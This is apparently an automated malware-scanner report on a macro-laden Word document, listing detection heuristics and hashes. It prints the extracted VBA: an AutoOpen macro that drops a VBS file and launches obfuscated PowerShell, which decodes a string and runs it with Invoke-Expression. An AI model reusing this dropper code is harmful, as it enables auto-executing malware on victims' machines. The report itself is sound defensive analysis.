MALICIOUS
Risk Score: 250
Heuristics 8
- VBA project inside OOXML (medium, 5 related findings) [OOXML_VBA]: Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical) [OLE_VBA_SHELL]: Potential Shell call in VBA. Matched line in script:
  Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus
- WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]: WScript.Shell usage. Matched line in script:
  x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script:
  x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script:
  Sub AutoOpen()
- Suspicious extracted artifact (medium) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2014/chartex In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 20224 bytes |

SHA-256: c2c510e154c91a7827341302aa9fc61c7721f6c69d3b9bba628b6e5898c68394
Detection
ClamAV: No threats found
Obfuscation or payload: likely
383 of 422 identifiers look randomly generated (e.g. 'RldOWkRWU1U1YkRYa2NXZHMxMFcxV1') — consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Dim msgBoXX As Object
Dim XTukL, XCsmNd As String
XTukL = VVV
XCsmNd = Replace("poXXXweXXXrshXXXelXXXl", "XXX", "") & " -Command $t= " & Chr(39) & XTukL & Chr(39) & ";$x=$t.ToCharArray();[array]::Reverse($x);$n =$t.length;$b='';for($i=0;$i -le $n; $i=$i+2){$b=$b+$x[$i+1]+$x[$i]} for($i=0;$i -lt 10;$i++){$b=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($b))};Invoke-Expression -Command $b"
Dim x As String
x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
savefile x
Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus
End Sub
Function VVV()
Dim str As String
str = ""
VVV = str
End Function
Sub savefile(XX)
Dim filePath As String
filePath = "C:\Users\WinUline\AppData\code.vbs"
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(filePath)
oFile.WriteLine XX
oFile.Close
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 48640 bytes |

SHA-256: a9730be018470d5e55c79fedf22550bd2138f95e955d6a41c183959dc3aa6a8f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
1004 of 1300 identifiers look randomly generated (e.g. 'RXMWZkdFpXWF1SUmBhWHhTVkJtS11w') — consistent with name-mangling obfuscation.